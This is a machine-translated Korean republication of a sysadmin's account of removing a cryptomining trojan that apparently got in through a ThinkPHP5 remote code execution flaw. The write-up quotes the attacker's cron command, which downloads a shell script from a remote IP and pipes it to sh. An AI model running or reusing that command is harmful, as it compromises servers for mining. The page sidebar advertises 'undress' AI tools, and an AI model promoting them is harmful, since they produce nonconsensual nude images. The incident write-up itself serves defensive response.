찾다
PHP 프레임워크ThinkPHP트로이 목마 제거 경험: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리

다음 튜토리얼 칼럼인 thinkphp에서는 thinkphp5 원격 코드 실행 취약점을 악용하는 트로이 목마에 대처하는 방법을 소개하겠습니다. 도움이 필요한 친구들에게 도움이 되길 바랍니다!

트로이 목마 제거 경험: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리

트로이 목마 제거 경험 기억하기: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리하기

어제 서버가 갑자기 느려진 것을 발견했습니다. Top은 여러 프로세스가 100% 이상을 사용하고 있음을 보여주었습니다. CPU

다음 명령을 실행하세요:

/tmp/php  -s /tmp/p2.conf

해킹된 것이 거의 확실합니다

다음 단계는 소스를 확인하는 것입니다

마지막에는 로그인 기록이 없습니다

이러한 프로세스를 먼저 종료하지만 몇 시간 후에 다시 나타납니다. 분

먼저 이 트로이 목마가 무엇을 하려는지 살펴보겠습니다

netstat 이 트로이 목마가 포트를 열고 외국 IP와 연결을 맺는 것을 봤습니다

그런데 tcpdump는 한동안 어떤 데이터 전송도 찾지 못했습니다

그가 원하는 것은 무엇이었나요? 할?

로그를 계속 확인해 보세요

크론 로그에서 www 사용자가 crontab 타이밍 작업을 하고 있는 것을 발견했는데, 이것이 기본적으로 문제입니다

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

몇 가지 질문을 다운받아 살펴보니 마이닝 트로이 목마 프로그램임에 틀림없습니다

Server 웹사이트의 www 사용자는 lnmp를 설치하여 생성되었습니다. 소스를 보면 웹 취약점일 수 있습니다.

다시 보니 /tmp 아래의 php 권한은 www입니다.

lnmp 아래 여러 사이트의 로그를 확인해 보니 최근 thinkphp 5에서 노출된 원격 코드 실행 취약점이 악용된 것을 발견할 수 있습니다.

취약점 세부정보: https:/ /nosec.org/home/detail/2050.html

문제를 수리하고 해결하세요

하지만 이 사이트는 테스트 사이트이고 포트 수신 대기는 8083입니다. 이제 해커가 색다른 포트를 스니핑할 수 있을까요?

출처: https://www.simapple.com/425.html

관련 추천: 최신 10개 thinkphp 비디오 튜토리얼

위 내용은 트로이 목마 제거 경험: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명
이 기사는 simapple에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제
ThinkPhp의 내장 테스트 프레임 워크의 주요 기능은 무엇입니까?ThinkPhp의 내장 테스트 프레임 워크의 주요 기능은 무엇입니까?Mar 18, 2025 pm 05:01 PM

이 기사는 ThinkPhp의 내장 테스트 프레임 워크에 대해 논의하여 장치 및 통합 테스트와 같은 주요 기능과 조기 버그 감지 및 개선 된 코드 품질을 통해 응용 프로그램 신뢰성을 향상시키는 방법을 강조합니다.

실시간 주식 시장 데이터 피드 구축에 ThinkPhp를 사용하는 방법은 무엇입니까?실시간 주식 시장 데이터 피드 구축에 ThinkPhp를 사용하는 방법은 무엇입니까?Mar 18, 2025 pm 04:57 PM

기사는 실시간 주식 시장 데이터 피드에 ThinkPHP를 사용하여 설정, 데이터 정확도, 최적화 및 보안 측정에 중점을 둡니다.

서버리스 아키텍처에서 ThinkPhp를 사용하는 데있어 주요 고려 사항은 무엇입니까?서버리스 아키텍처에서 ThinkPhp를 사용하는 데있어 주요 고려 사항은 무엇입니까?Mar 18, 2025 pm 04:54 PM

이 기사는 서버리스 아키텍처에서 ThinkPHP를 사용하기위한 주요 고려 사항에 대해 설명하고 성능 최적화, 무국적 설계 및 보안에 중점을 둡니다. 비용 효율성 및 확장 성과 같은 혜택을 강조하고 도전 과제를 해결합니다.

ThinkPHP 마이크로 서비스에서 서비스 검색 및로드 밸런싱을 구현하는 방법은 무엇입니까?ThinkPHP 마이크로 서비스에서 서비스 검색 및로드 밸런싱을 구현하는 방법은 무엇입니까?Mar 18, 2025 pm 04:51 PM

이 기사에서는 ThinkPHP 마이크로 서비스에서 서비스 검색 및로드 밸런싱 구현, 설정, 모범 사례, 통합 방법 및 권장 도구에 중점을 둡니다. [159 문자]

ThinkPhp의 종속성 주입 컨테이너의 고급 기능은 무엇입니까?ThinkPhp의 종속성 주입 컨테이너의 고급 기능은 무엇입니까?Mar 18, 2025 pm 04:50 PM

ThinkPhp의 IOC 컨테이너는 PHP apps.character 수 : 159의 효율적인 종속성 관리를위한 게으른 하중, 맥락 바인딩 및 메소드 주입과 같은 고급 기능을 제공합니다.

실시간 협업 도구를 구축하는 데 ThinkPhp를 사용하는 방법은 무엇입니까?실시간 협업 도구를 구축하는 데 ThinkPhp를 사용하는 방법은 무엇입니까?Mar 18, 2025 pm 04:49 PM

이 기사는 ThinkPhp를 사용하여 실시간 협업 도구를 구축하고 설정, WebSocket 통합 및 보안 모범 사례에 중점을 둡니다.

SaaS 애플리케이션 구축에 ThinkPhp를 사용하면 어떤 주요 이점이 있습니까?SaaS 애플리케이션 구축에 ThinkPhp를 사용하면 어떤 주요 이점이 있습니까?Mar 18, 2025 pm 04:46 PM

ThinkPhp는 가벼운 디자인, MVC 아키텍처 및 확장 성을 통해 SaaS 앱에 혜택을줍니다. 다양한 기능을 통해 확장 성을 향상시키고 개발 속도를 높이며 보안을 향상시킵니다.

ThinkPHP 및 RabbitMQ로 분산 작업 대기열 시스템을 구축하는 방법은 무엇입니까?ThinkPHP 및 RabbitMQ로 분산 작업 대기열 시스템을 구축하는 방법은 무엇입니까?Mar 18, 2025 pm 04:45 PM

이 기사는 설치, 구성, 작업 관리 및 확장성에 중점을 둔 ThinkPhp 및 RabbitMQ를 사용하여 분산 작업 큐 시스템을 구축합니다. 주요 문제는 고 가용성 보장, 손상과 같은 일반적인 함정을 피하는 것입니다.

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25 : Myrise에서 모든 것을 잠금 해제하는 방법
4 몇 주 전By尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

VSCode Windows 64비트 다운로드

VSCode Windows 64비트 다운로드

Microsoft에서 출시한 강력한 무료 IDE 편집기

SublimeText3 Linux 새 버전

SublimeText3 Linux 새 버전

SublimeText3 Linux 최신 버전

ZendStudio 13.5.1 맥

ZendStudio 13.5.1 맥

강력한 PHP 통합 개발 환경

SublimeText3 영어 버전

SublimeText3 영어 버전

권장 사항: Win 버전, 코드 프롬프트 지원!

Atom Editor Mac 버전 다운로드

Atom Editor Mac 버전 다운로드

가장 인기 있는 오픈 소스 편집기